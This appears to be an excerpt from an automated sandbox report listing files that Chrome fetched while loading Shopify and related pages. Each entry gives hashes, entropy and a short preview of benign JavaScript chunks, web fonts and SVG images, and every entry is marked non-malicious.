                                                                    Size (bytes):3251
                                                                    Entropy (8bit):5.406394363440161
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7F07DA88F30D30C7BFBC6C40E702E265
                                                                    SHA1:171AA49425753AB6E838F888FB098CF9BF684A7F
                                                                    SHA-256:67F5F98D7672F2BD4479B331E3C80607DB9B29873BECE0E0072B6E648300858F
                                                                    SHA-512:8576DF85391BADA82F1D02E554155FED8C9E863BA28724619F6FB4F7394936DC8661E12E764D14216E00D6B7F84EA2B92CF88F51C6B9AC6CD173B0958C42F662
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-Q376MYYD.js
                                                                    Preview:import{e as F}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NQDYGCFV.js";import{a as R}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZPCN7UGW.js";import{a as w}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-KZHICCPI.js";import{i as N}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{m as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{a as I}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as S}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as D}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var r=u(D()),f=u(I());var e=u(S());fu
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 33092, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):33092
                                                                    Entropy (8bit):7.993894754675653
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:057478083C1D55EA0C2182B24F6DD72F
                                                                    SHA1:CAF557CD276A76992084EFC4C8857B66791A6B7F
                                                                    SHA-256:BB2F90081933C0F2475883CA2C5CFEE94E96D7314A09433FFFC42E37F4CFFD3B
                                                                    SHA-512:98FF4416DB333E5A5A8F8F299C393DD1A50F574A2C1C601A0724A8EA7FB652F6EC0BA2267390327185EBEA55F5C5049AB486D88B4C5FC1585A6A975238507A15
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
                                                                    Preview:wOF2.......D......6...............................a......Z?HVAR...`?STAT.8'2..F/~.....|.M....0....6.$.... ..x..<..[.%Q.i.<.N..t.Yx..5.A...|..g#l....5.....D.Bt.......l.Y].)..(..H.s..V..r*uM....[.**....I.0h.v.Hc.R..]....`$.I)G.+.}....E%.H..|..%nEE.....+.x..7|........[..V....[.......0...CA.._....)2.$.....s_fw....+.V.H.B.<?.?..mloc..1.Q....a.r#...)......|.F>..../6-.......t......>......tO.:f@b....u.I(.Bc..b....7.?A.....vE.}...kb]W7.h..$@......T1t.8.._?...~..,..I..."Y...1..s.V........R.Bf2..I....s.........u.P.&..D./"2qf....p.sv..)b5.yR.$MR3.@.E../>{w.....f...cN...2.v.....]>..Ow...9/!v...r..1.4.n.w...T......=...hRH!.....2`...u..82L...S.v.ik^.V.....@..N....d{..{...NN"'.H...H$..H.<..{?..x.....zv.}.~.N)4.g...X.....8|}...e,%.:..;.Q..88...@..=UVHe....g..zD?..U...~.J...oMoP..6B"Y.{BN...vY<.o..r.7.7j%.Z%.'...]...........YK...,.a-;.M....>\.......%'+8Z.1K.y...9.(;.5 ..M..L.(..9...T)........hx..i2Y...m*..{ulY...d......")^.,.n.~..r..S.o.$.....6=.i...N.....q0 ....
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (843)
                                                                    Category:downloaded
                                                                    Size (bytes):844
                                                                    Entropy (8bit):5.251885478022257
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B76316F402A8187774FAE2EBC5AC7E02
                                                                    SHA1:0691B0AB422658FC4E96F962828FF2456B60825E
                                                                    SHA-256:92405BBA54ED6A22145775C9F05AD9B7D662E653D084F762A98FC7785A71E17E
                                                                    SHA-512:65EBF1247E18834C512D8591CC5B9BA69EEE63246FEFCAA94C6FA5FC899E9BBE3E0ADD9C272130C2DA5EFBA28AD519F04B162E46586E188F7590365142042BE2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/entry.client-EF3SCZJV.js
                                                                    Preview:import{a as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-QFMWBZ23.js";import{x as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-52DI3OUV.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var n=o(m()),l=o(s());function a(e,t){window.requestIdleCallback?window.requestIdleCallback(e,t):window.setTimeout(e,t?.timeout??1)}var d=o(r());async function u(){let e=window.__remixContext.url,t=window.location.pathname;e===t&&(0,n.startTransition)(()=>{(0,l.hydrateRoot)(document,(0,d.jsx)(i,{}))})}a(u);.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):5268
                                                                    Entropy (8bit):4.50424391885815
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6BA4DDB8FF7A023FC6B50BAAE7545327
                                                                    SHA1:3D547838A7AE9D235EC79F22595DC6500297BD8C
                                                                    SHA-256:98C66AAC89E5D54DBC72AC0CB657BCCD6FBB2B6CD5EF21B88BC13F12A3DD1A07
                                                                    SHA-512:2FEC4380B8F6488E2CC701978A3635494B1FD2A62384A4620B1A1898571E6096013F8891FB3F1772EE26D4FD056E787D5BE6FEF08C50A5AE59F45E6B1B9F300A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="153" height="63" viewBox="0 0 153 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="152" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1397_6444)"/>.<g opacity="0.78" clip-path="url(#clip0_1397_6444)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M122.645 26.405H127.191C127.354 26.405 127.456 26.5461 127.395 26.6871L122.726 40.0379C122.686 40.1792 122.523 40.3203 122.36 40.3203H117.875C117.711 40.3203 117.548 40.1792 117.508 40.0379L115.05 33.0083C115.056 33.1258 115.059 33.2437 115.059 33.3627C115.059 37.4222 111.72 40.725 107.616 40.725C103.875 40.725 100.77 37.9787 100.252 34.4164V40.0379C100.252 40.1792 100.129 40.3203 99.9465 40.3203H96.4195C96.2768 40.3203 96.0931 40.2196 95.9912 40.058L92.4441 33.7861V40.0379C92.4441 40.1787 92.3228 40.3188 92.1405 40.32H87.885L79.0755 27.8216V40.3296H78.1875V26.3993H79.0755L87.8917 38.8863V26.3993H88.3247L89.139 26.405H92.0574C92.2411 26.405 92.4441 26.5057 92.5259 26.667L96.0529
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1243)
                                                                    Category:downloaded
                                                                    Size (bytes):1244
                                                                    Entropy (8bit):5.264989275736587
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:43DAEA0351E3AE7F2CAFE52C52BF5308
                                                                    SHA1:293A87B6D886DF0DCCF14F096E6323B1A9C412FC
                                                                    SHA-256:63D839A6F7630265081DE795422B028A84EFAA6830193168359E7BA5402B41A6
                                                                    SHA-512:759D231D9991E538A85431BEF6A492F77FDDEEDAE59D9B29C4CD048A22CD39BC1A584B8F7A4DE820D3E6687E9C2BABF4DAFC7D4CA367F0A2108D08D9CBBC526F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZEN4WGU6.js
                                                                    Preview:import{b as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-KAPAKHAP.js";import{b as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3HQUNPWN.js";import{a as s,b as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5LSG7SHH.js";import{b as e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=n(r());function h({className:i,headingClassName:l,buttonsClassName:c,mode:t="light",kicker:u,headingHtml:d,subheadHtml:g,buttons:C,disclaimerHtml:G,displayPromoBanner:P}){let f="conversion",N={start:{xs:1,sm:1,md:2,lg:3,xl:3},span:{xs:4,sm:8,md:10,lg:8,xl:8}},x={className:l,kicker:u,headingHtml:d,subheadHtml:g,center:!0,mode:t},v={className:e(
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):18597
                                                                    Entropy (8bit):3.978269566805637
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:F5D0030128DFAFB20B4B20353078A461
                                                                    SHA1:A80DE02E5C989BA4730AAC9A8CACF74AB78E6253
                                                                    SHA-256:2DB9E929870BBB79BE6A1C31F02C2F83F35750D057679A912D67C5F34C1E1BB6
                                                                    SHA-512:750CD89D54D7480A77D45CB8FD5C15E1D12482AF2DF8843FD16329424FDE9B083883D52FFC99D06CA789DA48BA556BDABEAB348221C5CAEA1E6F128F8A99C675
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="152" height="65" viewBox="0 0 152 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1549_7225)">.<rect x="1" y="1" width="150" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip1_1549_7225)">.<path d="M59.8906 49.5544C59.9214 49.5585 59.9528 49.5555 59.9822 49.5455C60.0116 49.5355 60.0383 49.5188 60.0602 49.4966C60.0921 49.4509 60.1079 49.3958 60.105 49.3401V45.2616C60.1081 45.2053 60.0924 45.1495 60.0602 45.1032C60.0383 45.0811 60.0116 45.0643 59.9822 45.0544C59.9528 45.0443 59.9214 45.0413 59.8906 45.0453V44.9373H61.0761V45.0453C61.0451 45.0414 61.0134 45.0445 60.9838 45.0545C60.9541 45.0646 60.927 45.0812 60.9047 45.1032C60.8725 45.1495 60.8568 45.2053 60.8599 45.2616V49.3401C60.857 49.3958 60.8728 49.4509 60.9047 49.4966C60.927 49.5186 60.9541 49.5353 60.9838 49.5453C61.0134 49.5553 61.0451 49.5584 61.0761 49.5544V49.6626H59.8906V49.5544ZM68.0737 48.4771V45.2616C68.0763 45.205 68.0598 45.1492 68.0271 45.1032C68.0052 45.0811 67.9785 4
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1319)
                                                                    Category:downloaded
                                                                    Size (bytes):1359
                                                                    Entropy (8bit):5.172029721317877
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D9F0104452123726430791DEF13E4AB1
                                                                    SHA1:4D44D8CF540FBB6DD19A198D83CBEB504314DD84
                                                                    SHA-256:B7326418199FE832ECFCEC70B9E885777BD78B152E08302FE9AFCEEE9C1DA99E
                                                                    SHA-512:81EC15F5859C6ECB7AE6B1969E9FAC2BA27BB394AED047B354CC7CA73EEB6C3F4BC54DF283BD89D13BC1AE03B8725C83F9C1B92722AD038509742AA88CEA46F2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://storage.googleapis.com/workbox-cdn/releases/6.2.0/workbox-sw.js
                                                                    Preview:!function(){"use strict";try{self["workbox:sw:6.2.0"]&&_()}catch(t){}const t={backgroundSync:"background-sync",broadcastUpdate:"broadcast-update",cacheableResponse:"cacheable-response",core:"core",expiration:"expiration",googleAnalytics:"offline-ga",navigationPreload:"navigation-preload",precaching:"precaching",rangeRequests:"range-requests",routing:"routing",strategies:"strategies",streams:"streams",recipes:"recipes"};self.workbox=new class{constructor(){return this.v={},this.Pt={debug:"localhost"===self.location.hostname,modulePathPrefix:null,modulePathCb:null},this.$t=this.Pt.debug?"dev":"prod",this.Ct=!1,new Proxy(this,{get(e,s){if(e[s])return e[s];const o=t[s];return o&&e.loadModule("workbox-"+o),e[s]}})}setConfig(t={}){if(this.Ct)throw new Error("Config must be set before accessing workbox.* modules");Object.assign(this.Pt,t),this.$t=this.Pt.debug?"dev":"prod"}loadModule(t){const e=this.jt(t);try{importScripts(e),this.Ct=!0}catch(s){throw console.error(`Unable to import module '$
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (550)
                                                                    Category:downloaded
                                                                    Size (bytes):551
                                                                    Entropy (8bit):5.37930130558101
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DF09A468A8F93ADE9DA8BC5AB127D1C9
                                                                    SHA1:A91E13E1F7EB89FE4802F07FF8105B578AC46FEB
                                                                    SHA-256:D5B0B187B903A268084444E3FB71905F00E6C2E100D002803EF1CE36A29325A9
                                                                    SHA-512:AEE72D4C9F9528D85E2E59BE1355C5DB9D090428A18FD959BF9AAF4BB9D6EDCDC4DECC96ED398DD8FF4320FA56774254991E4EE1D83C360DA7CFD599B30330C2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VODLJLRC.js
                                                                    Preview:import{a as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=r(t()),l=e=>(0,o.jsx)("svg",{viewBox:"0 0 36 36",...e,children:(0,o.jsx)("path",{fill:"currentColor",d:"M34 17.5c0 .83-.43 1.596-1.132 2.02L9.535 33.664a2.307 2.307 0 0 1-2.352.03A2.365 2.365 0 0 1 6 31.644V3.358c0-.848.453-1.63 1.183-2.05a2.305 2.305 0 0 1 2.352.03L32.868 15.48A2.356 2.356 0 0 1 34 17.5"})}),p=l;export{p as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):67844
                                                                    Entropy (8bit):5.438480589557146
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2A92F76B77032646F7CCE43FD53FCCF6
                                                                    SHA1:BB677C696937C66940B0F9CB6903266C2DB99EED
                                                                    SHA-256:415DC0622EB68EA5BDD9E4A7201BF73107CAFF4EAD91DBFC0960E4F2D947F91E
                                                                    SHA-512:4488D4F40852C71D45520980648D605868232F12731A0123450A7A555D95D741D8AAD26BDE898BB4161875E97E48E2C9641B3D000FB8BD5A31E2FAF1C102610E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-YGRQU55U.js
                                                                    Preview:import{a as le}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PT2PVC5H.js";import{a as R}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-SDWEBNFN.js";import{b as Wt}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-KAPAKHAP.js";import{a as be}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LO4FJPJR.js";import{a as Gt,b as Ht,c as Oe,d as Ee}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-OTRC2TBF.js";import{a as $t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3IZVO27T.js";import{a as _t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NXLQIWVT.js";import{a as oe,b as re}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EM5M5Y6T.js";import{a as Vt}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VSRONMTM.j
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 23580, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):23580
                                                                    Entropy (8bit):7.990537110832721
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:E1B3B5908C9CF23DFB2B9C52B9A023AB
                                                                    SHA1:FCD4136085F2A03481D9958CC6793A5ED98E714C
                                                                    SHA-256:918B7DC3E2E2D015C16CE08B57BCB64D2253BAFC1707658F361E72865498E537
                                                                    SHA-512:B2DA7EF768385707AFED62CA1F178EFC6AA14519762E3F270129B3AFEE4D3782CB991E6FA66B3B08A2F81FF7CABA0B4C34C726D952198B2AC4A784B36EB2A828
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2
                                                                    Preview:wOF2......\........,..[...........................z.p.`..D....e........]..B..6.$..v. .....E.K...5c[R..V.Vr!.....$....@n..P.....'%.1....."A...#H:.T.6.JL.7.g..7..x....N"..,h....R3..u.T..A.._O..f=Mu.e.....0.c.0.FV.q....m;8..J.t.-.%."....*..&..2...!\....n..]Lx..:......S/F.V.rf%..#.Uk}....X.1n..V.|.O..aC ."...#..>..n.... $;.....y.5..|>...;@..Q.D........FT...r=p.Llf...J.3..{Z.. t]Rp.N..Z..7"B..,D.0s..."o..V<...#.N.WZ...m.\......Pb....#:z...B......~w.....J.ABQ.u<.8j..m..r2.....Aq.fNY...P..c.L+......v.n..yV.w......l......H...,..2.."v.......R.V.[...s......@..L....CS..'....Z.2..o......).4.H{C.%..?.%^...#.A.]..[....._&.[~1..j.P..`.......=......[.D7h..5...s......d'.....,....?...6.;....f..(M.CV.....R..q.c.....4.6.k.V.h/..........H..?u..!mq5...9@..0YA9.M..:..reS.;._......K...\..S.^.2..Fv.l~'l..U.TN*....OXv..]..`.X1w.4E.t%a...2!.c.R.............t.'Hc...2.8...K.w..p@..T*..RZ.@..)}..*'+.7s1..... . -.....E7<...C.J.D....Iw-...u...m.K.\e..>..*....7y|{........G..d13g].t.%.y<..
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (321)
                                                                    Category:downloaded
                                                                    Size (bytes):322
                                                                    Entropy (8bit):5.043937486478691
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:943D3A505A81E081E60072569033B7AA
                                                                    SHA1:E736B039D8AB820DF14244B5841A2F834AC4EFB5
                                                                    SHA-256:EEE9EB924EE616F8AA4EDF7A4A141F259B258D77A2465F68049F3410CB87E50E
                                                                    SHA-512:C5A031A26CFFFE7646CBF6C42C9B0B821EAA51F94A11C2556AE1AEAAE390DBE990720DB6BFDE75FE9B53A7C7A771794F553AE6111C20D8633574ABF5E796C3D2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-QFMWBZ23.js
                                                                    Preview:import{a as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-52DI3OUV.js";import{c as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var a=n(t=>{"use strict";var e=i();t.createRoot=e.createRoot,t.hydrateRoot=e.hydrateRoot;var s});export{a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):109
                                                                    Entropy (8bit):4.615821709661364
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:04A240F6F5BA554EDD89303F4812936E
                                                                    SHA1:E3A521873C481E51379AE49707BA5B041C39F27F
                                                                    SHA-256:CB36E4C6ED7D7907B3204B37C0E3380AAD41A798003C429FA9DCA2663D77952B
                                                                    SHA-512:DCC3B112DBE57942708392FA4C9ADBB4F5BB8E3D5D3B800D73367E0BE45FF743F67B01530123CD235A9435992E44020C1C71990E9AE5C0FBADE7EA3AB6F8698C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.visme.co/fonts/css/Arial.css
                                                                    Preview:@font-face{font-family:arial;src:url(../fonts/arial.woff2) format('woff2');font-weight:400;font-style:normal}
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):740
                                                                    Entropy (8bit):4.700368448719313
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:54E01EB0D111F18F68DB87E08AEA8910
                                                                    SHA1:DE3F2064A3D9E4B123D490538EF9AB6405544201
                                                                    SHA-256:E34CEA4D9C63F5F4189F600B6DB4CDBCAFD75D407EA7C9AF3251FF3E377FE00E
                                                                    SHA-512:85A557C2D41AF783DB4879C326FA172ADBB482C2471586BA947CA096C503E4A42664FC4DAC57ED465569DA343F6456A0D1FC2FE06A70F2EE6A3EFC0A4463257A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="#4BFE85" xmlns="http://www.w3.org/2000/svg">. <path d="M3 8L12 8" stroke="#4BFE85" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"/>. <path d="M8.70711 2.29289C8.31658 1.90237 7.68342 1.90237 7.29289 2.29289C6.90237 2.68342 6.90237 3.31658 7.29289 3.70711L8.70711 2.29289ZM13 8L13.7071 8.70711C14.0976 8.31658 14.0976 7.68342 13.7071 7.29289L13 8ZM7.29289 12.2929C6.90237 12.6834 6.90237 13.3166 7.29289 13.7071C7.68342 14.0976 8.31658 14.0976 8.70711 13.7071L7.29289 12.2929ZM7.29289 3.70711L12.2929 8.70711L13.7071 7.29289L8.70711 2.29289L7.29289 3.70711ZM12.2929 7.29289L7.29289 12.2929L8.70711 13.7071L13.7071 8.70711L12.2929 7.29289Z" fill="#4BFE85"/>.</svg>.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (7847)
                                                                    Category:downloaded
                                                                    Size (bytes):34465
                                                                    Entropy (8bit):5.391073547391319
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9E73ACCD1174420361178BAEB969C4BB
                                                                    SHA1:B39AE55BF5217CD6A34CA045656652DB1B785507
                                                                    SHA-256:455FD8944213652AD2B8F0FA17EC1A114E3B70696CF9166016A5E6D602922184
                                                                    SHA-512:58D6B0759EAB8C71923A73A79F73DCB221E2F69CB7711593FFF03AFF7B22B6887FBA92E4B49529CAF546F5236EABA04C176F625E6E4E2E498E9B0EC66BA32C72
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VVXUZZC3.js
                                                                    Preview:import{g as W}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";function Q(){return{async:!1,breaks:!1,extensions:null,gfm:!0,hooks:null,pedantic:!1,renderer:null,silent:!1,tokenizer:null,walkTokens:null}}var z=Q();function te(c){z=c}var ne=/[&<>"']/,pe=new RegExp(ne.source,"g"),se=/[<>"']|&(?!(#\d{1,7}|#[Xx][a-fA-F0-9]{1,6}|\w+);)/,ue=new RegExp(se.source,"g"),fe={"&":"&amp;","<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#39;"},J=c=>fe[c];function d(c,n){if(n){if(ne.test(c))return c.replace(pe,J)}else if(se.test(c))return c.replace(ue,J);return c}var ge=/&(#(?:\d+)|(?:#x[0-9A-Fa-f]+)|(?:\w+));?/ig;function ke(c){return c.replace(ge,(n,e)=>(e=e.toLowerCase(),e==="colon"?":":e.charAt(0)==="#"?e.charAt(1)==="x"?String.fromCharCode(parseInt(e.substring(2),16)):String.fromCharCode(+e.substring(1)):""))}var de=/(^|[^\[])\^/g;function k(c,n){let e=typeof c=="string"?c:c.source;n=n||"";let t={replace:(r,i)=>{let s=typeof i=="string"?i:i.source;return s=s.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 36208, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):36208
                                                                    Entropy (8bit):7.9944368202697405
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:13CEF8B692D785DAA4E0741C67BE61CC
                                                                    SHA1:CAA75B34AEDAA0723E5B5B1BAB4555F238BC3419
                                                                    SHA-256:7BCD06088749D5C335D53A94579FA52ED3A934858DB5C31F92FCBE558068F27A
                                                                    SHA-512:A13D814E715955EFEDE5F8B9C207E61F22C28E30F53F5FF94491FE39E0F6718E7712E291D1BCEE962E5167C1DCD16CDECE72A10A36396EFEE2D163C5CED5BD6D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure2/production/fonts/IBMPlexMono--semibold.woff2
                                                                    Preview:wOF2.......p......................................2.....n.`..:.. .D..s.....`..@.. ..6.$..<. ..H..U..X[.......>x....R.$..gm_../..'...P..2>;....V..(........w$....F.v.@U.U....R.bV.(..}..^H....$!.f.Pl.\\.......I..k...#;..V..I.....M...d.;f.....<.6.|........IDY6|..=%.i.......4s....^.\u.dB.5..Y.>.r.&.IH.g(....O..q?L*....Z.:+..25Z.>.....W...9...iz..a....].tY.?.a..^.......7B.Rf.<..........P=."...j.y...H.BD.*L0E.....].7....%~8).F.,..=.(.5..?'~..I....Q.x.......f.V|..p...ve..89..].'.....k...@..2.\.lS..QJ..<....4IS..P.4....}..Dx.}&.>....d...m.H...cc,..h..,....1...d.Va^0.*(.^.q...{.F.><.i.-2..q.n.Ma...Aw...@.....?S(!'.R./,\(l.....Q.4.W.4.c,...._..^..Y..dW.[......!.g...._JIN.\.V5......^..Rv.1Ki......;;.$_..}.IAv....2M..l.d30.P.D..UN.k..-[..I......:....`4..yC..v.....2....Q&]...s....d.m:.Hq.X.....VZ.t.Csf.j.l....2hd.C..[..%..M..ep.HEhm.J...."#2..-.......<.....E..Z#2"..........<..t...H.l.9.V.)c.....Z.^. ..z j<.....;..M*p.*.@.B/....].dY..C........k_..
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (4470)
                                                                    Category:downloaded
                                                                    Size (bytes):4471
                                                                    Entropy (8bit):5.178438244370271
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6F04925A19D9A7E02CFA4A0839CE9A62
                                                                    SHA1:E0C4F10F3DCD3B806FE4D068C342B8599BAB35D3
                                                                    SHA-256:11DF34B6BC7D10BC450494F12C7CD80F76B496A9B95442BF167B8A6C46ECBA16
                                                                    SHA-512:1A98C74E3E31ACE86A76BCD337389F836FD481EBE1BBDF1214A30C26850EF22288C729C452D5109EFFD839F5EB1FFFF373C3A175D1A6BA0E6B8D1EB8CB94DC76
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NQDYGCFV.js
                                                                    Preview:import{b as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{h as x}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{a as y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var P=["dark","kale","black","deep_blue","pos_dark"],N=e=>["pos_light","pos_warm_gray"].includes(e)?"pos-dark":P.find(t=>e===t)?"light":"dark";var k=a(y());var b=a(l());function C({children:e,className:o,href:t,style:s={},componentName:n="",onClick:r,...i}){let d=x.test(t);return(0,b.jsx)("a",{"aria-haspopup":d?"dialog":void 0,className:o,"data-component-name":n,href:t||"",role:d?"button":void 0,onClick:r,style:s,...i,children:e})}function p({className:e="",chi
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (49642)
                                                                    Category:downloaded
                                                                    Size (bytes):6351238
                                                                    Entropy (8bit):5.472006274564179
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CF4BF8960BF2BE2A898BEE70D8A2A9D2
                                                                    SHA1:7FC2E539E15B54CF4B951F887D18ECC29183D312
                                                                    SHA-256:6EF5A2F8535523924895955652DCD57D6DB43D677CF2C23E6E5765D99167132B
